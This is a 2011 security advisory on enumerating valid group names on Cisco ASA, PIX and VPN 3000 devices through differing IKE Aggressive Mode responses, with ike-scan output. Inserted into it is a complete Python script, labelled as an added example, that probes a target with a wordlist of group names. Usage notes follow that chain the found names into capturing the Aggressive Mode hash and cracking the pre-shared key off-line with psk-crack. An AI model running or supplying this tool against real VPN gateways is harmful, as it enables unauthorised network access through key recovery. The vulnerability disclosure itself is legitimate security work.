Cisco IPSec VPN Implementation Group Name Enumeration

Summary – 22.03.2011

Name: Cisco IPSec VPN Implementation Group Name Enumeration
Reference: NGS00014
Discoverer: Gavin Jones
Vendor: Cisco
Vendor Reference: CSCei51783, CSCtj96108
Systems Affected: ASA 5500 Series Adaptive Security Appliances, Cisco PIX 500 Series Security Appliances, Cisco VPN 3000 Series Concentrators (models 3005, 3015, 3020, 3030, 3060, and 3080)
Risk: Low
Status: Published

TimeLine

Discovered: 20 March 2009
Released:  8 November 2010
Approved:  8 November 2010
Reported:  8 November 2010
Fixed:  1 December 2010
Published: 22 March 2011

Description

Because the device(s) return differing responses to IKE Aggressive Mode requests depending on whether the supplied group name exists, it is possible to enumerate valid group names from the VPN device(s).  With a valid group name, the Aggressive Mode response (which carries a hash derived from the pre-shared key) can then be captured and the pre-shared key recovered by an off-line brute-force attack.

Technical Details

This output shows an ike-scan Aggressive Mode request against the device, specifying an invalid group name as the IKE identity:

Starting ike-scan 1.9 with 1 hosts
(http://www.nta-monitor.com/tools/ike-scan/)

10.1.0.1   Aggressive Mode Handshake returned
     HDR=(CKY-R=d508a1efacad8015)
     SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=XAUTH LifeType=Seconds
LifeDuration=28800)
     KeyExchange(128 bytes)
     Nonce(20 bytes)
     ID(Type=ID_FQDN, Value=Pix.domain.com)
     Hash(20 bytes)
     VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
     VID=09002689dfd6b712 (XAUTH)
     VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
     VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)
 
Ending ike-scan 1.9: 1 hosts scanned in 0.031 seconds (32.62 hosts/sec).  1 returned handshake; 0 returned notify

The same request is then repeated with a valid group name, and as can be seen the response differs:

Starting ike-scan 1.9 with 1 hosts
(http://www.nta-monitor.com/tools/ike-scan/)

10.1.0.1   Aggressive Mode Handshake returned
     HDR=(CKY-R=4fa4cf45d5039335)
     SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=XAUTH LifeType=Seconds
LifeDuration=28800)
     KeyExchange(128 bytes)
     Nonce(20 bytes)
     ID(Type=ID_FQDN, Value=Pix.domain.com)
     Hash(20 bytes)
     VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
     VID=09002689dfd6b712 (XAUTH)
     VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
     VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
     VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)

Ending ike-scan 1.9: 1 hosts scanned in 0.031 seconds (32.19 hosts/sec).  1 returned handshake; 0 returned notify

As can be seen above, the response to the request with the valid group name contains an additional Vendor ID payload:

VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

By checking the responses for this additional VID it is possible to enumerate the valid group name.

This has been replicated in testing against a number of PIX based devices.  Once a valid group name is known, the Aggressive Mode hash can be collected with ike-scan and the pre-shared key cracked off-line using psk-crack.
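The enumeration loop described above, as an added example that is not part of the advisory or of ike-scan itself. It drives ike-scan 1.9 (the command line used, `ike-scan -A -M --id=<group> <host>`, is an assumption; depending on the device the ID type may also need to be forced with `--idtype`), classifies each response by the presence of the Dead Peer Detection v1.0 Vendor ID that the advisory identifies as the tell, and additionally reports any other Vendor ID that appears for a candidate but not in a known-invalid baseline, which generalises the check. The two embedded responses are constructed from the advisory output so the classifier can be exercised offline; the group names are hypothetical.

```python
#!/usr/bin/env python3
"""IKE Aggressive Mode group-name enumeration driven by ike-scan output.

Added example, not code from the NGS advisory or from ike-scan. The decision
rule (DPD v1.0 VID present => valid group name) is the one the advisory describes.
"""
import re
import subprocess
from typing import Callable, Iterable, List, Optional, Set

# Vendor ID the advisory observes only in responses to a valid group name.
DPD_V1_VID = "afcad71368a1f1c96b8696fc77570100"   # Dead Peer Detection v1.0

VID_RE = re.compile(r"VID=([0-9a-fA-F]+)")
HANDSHAKE_MARKER = "Aggressive Mode Handshake returned"

# Sample ike-scan responses, constructed from the two outputs in the advisory.
INVALID_GROUP_OUTPUT = """\
10.1.0.1   Aggressive Mode Handshake returned
     HDR=(CKY-R=d508a1efacad8015)
     SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=XAUTH LifeType=Seconds LifeDuration=28800)
     KeyExchange(128 bytes)
     Nonce(20 bytes)
     ID(Type=ID_FQDN, Value=Pix.domain.com)
     Hash(20 bytes)
     VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
     VID=09002689dfd6b712 (XAUTH)
     VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
     VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)
"""

# Identical except for the extra DPD v1.0 Vendor ID payload.
VALID_GROUP_OUTPUT = INVALID_GROUP_OUTPUT.replace(
    "     VID=4048b7d5",
    "     VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)\n"
    "     VID=4048b7d5",
)


def vendor_ids(output: str) -> Set[str]:
    """Lower-cased set of Vendor ID payloads present in one ike-scan response."""
    return {v.lower() for v in VID_RE.findall(output)}


def classify(output: str) -> str:
    """'valid' if the DPD v1.0 VID is present, 'invalid' if a handshake came back
    without it, 'no-response' if the peer did not answer the Aggressive Mode request."""
    if HANDSHAKE_MARKER not in output:
        return "no-response"
    return "valid" if DPD_V1_VID in vendor_ids(output) else "invalid"


def extra_vids(baseline_output: str, candidate_output: str) -> Set[str]:
    """Vendor IDs seen for a candidate group but absent from a known-invalid baseline.
    Any difference here is a response-based leak, not only the DPD VID."""
    return vendor_ids(candidate_output) - vendor_ids(baseline_output)


def ike_scan_cmd(host: str, group: str) -> List[str]:
    """Assumed ike-scan 1.9 invocation: -A Aggressive Mode, -M one payload per line,
    --id sets the IKE identity, which carries the group name for Cisco clients."""
    return ["ike-scan", "-A", "-M", f"--id={group}", host]


def run_ike_scan(host: str, group: str) -> str:
    """Run ike-scan for one candidate (needs raw-socket privileges); returns stdout."""
    proc = subprocess.run(ike_scan_cmd(host, group), capture_output=True,
                          text=True, check=False)
    return proc.stdout


def enumerate_groups(host: str, candidates: Iterable[str],
                     probe: Optional[Callable[[str], str]] = None) -> List[str]:
    """Return the candidate group names whose response carries the DPD VID.
    `probe(group) -> ike-scan output` defaults to running ike-scan; it is
    injectable so the logic can be tested against canned output."""
    probe = probe or (lambda g: run_ike_scan(host, g))
    return [g for g in candidates if classify(probe(g)) == "valid"]


if __name__ == "__main__":
    import sys
    target, wordlist = sys.argv[1], sys.argv[2]
    with open(wordlist) as fh:
        names = [line.strip() for line in fh if line.strip()]
    for name in enumerate_groups(target, names):
        print(f"[+] valid group name: {name}")
```

Usage: `sudo python3 enum_groups.py 10.1.0.1 groups.txt`. With a confirmed group name, the follow-on step the advisory describes is `ike-scan -A --id=<group> -P<hashfile> <host>` to save the Aggressive Mode hash, then `psk-crack -d <wordlist> <hashfile>` to brute-force it off-line. Rate-limit the probes in practice: each candidate is a full Aggressive Mode exchange that the device will log.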

Fix Information

Cisco has released a patch that addresses the issue. The announcement of this patch can be found here:

http://www.cisco.com/en/US/products/products_security_response09186a0080b5992c.html

Patches can be downloaded from Cisco’s online support portal at:

http://www.cisco.com
